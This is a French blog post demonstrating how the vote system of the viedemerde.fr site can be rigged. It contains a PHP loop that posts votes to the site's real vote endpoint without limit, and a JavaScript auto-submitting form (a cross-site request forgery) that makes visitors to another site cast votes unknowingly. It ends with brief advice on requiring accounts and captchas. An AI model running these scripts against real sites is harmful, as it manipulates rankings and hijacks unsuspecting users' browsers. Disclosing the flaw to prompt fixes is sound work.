[VDM] – Truquer les votes !!!

cohlitxviaadupe

 

Salut à tous,

 

Tout d'abord permettez-moi de vous souhaiter un excellent lundi !
Ensuite, et pour introduire doucement le sujet, je vais vous parler du système de vote sur VDM

 

capture

 

À l'heure actuelle, vous avez l'impression qu'il n'est possible de voter qu'une fois ...
Ce qui est bel et bien le cas ... à condition de ne pas effacer ses cookies !

Pour faire simple, il n'y a pas de véritable mesure de sécurité pour filtrer les doubles, triples ou quadruples votes !

Il est donc possible pour de vilains pirates, de coder ce genre de script  ...

 

$vdm = array(
		  "url"=>"http://www.viedemerde.fr/ajax/articles/vote.php",
		 "params"=>array(
				  "id"=>"1110",
				  "nb"=>"43999",
				  "type"=>"agree",
				  "story_type"=>"article",
		  )
);

while (1){
		  echo post($vdm["url"], $vdm["params"])."\n";
		  $vdm["params"]["nb"]++;
		  sleep(1);
}

Qui pourrait voter à l'infini !

 

Il est même possible de faire voter des gens qui viennent sur votre site ^^

Avec ce genre de petit script :

var d = document, hack = {
	"url":"http://www.viedemerde.fr/ajax/articles/vote.php",
	"method":"post",
	"params":{
		"id":"8765696",
		"nb":"402",
		"type":"deserve",
		"story_type":"article",
	}
}, form = d.createElement('form'), input;
form.action = hack.url;
form.method = hack.method;
for (var i in hack.params){
	input = document.createElement('input');
	input.name = i;
	input.value = hack.params[i];
	form.appendChild(input);
}
form.submit();

 

Rendant encore plus complexe la détection d'une triche, puisque les utilisateurs voteront sans le vouloir et auront des adresses IP différentes.

... résultat des courses ...

En soi tout le monde s'en fout, mais c'est pratique si l'on part du constat que plus le nombre de votes est important, plus la VDM est référencée !!!

 

Mais alors comment on se sécurise contre ça ?

Eh bien, le vote ne devrait être disponible que pour des utilisateurs "connectés".
Conséquence, ils ne pourraient alors voter qu'une fois pour chaque VDM (si le webmaster enregistre le vote / utilisateur).
La création du compte serait quant à elle, soumise à un capcha pour éviter que des robots ne créent pleins de faux comptes pour voter !

 

 

Partagez ce contenu

Laisser une réponse

Votre adresse de messagerie ne sera pas publiée. Les champs obligatoires sont indiqués avec *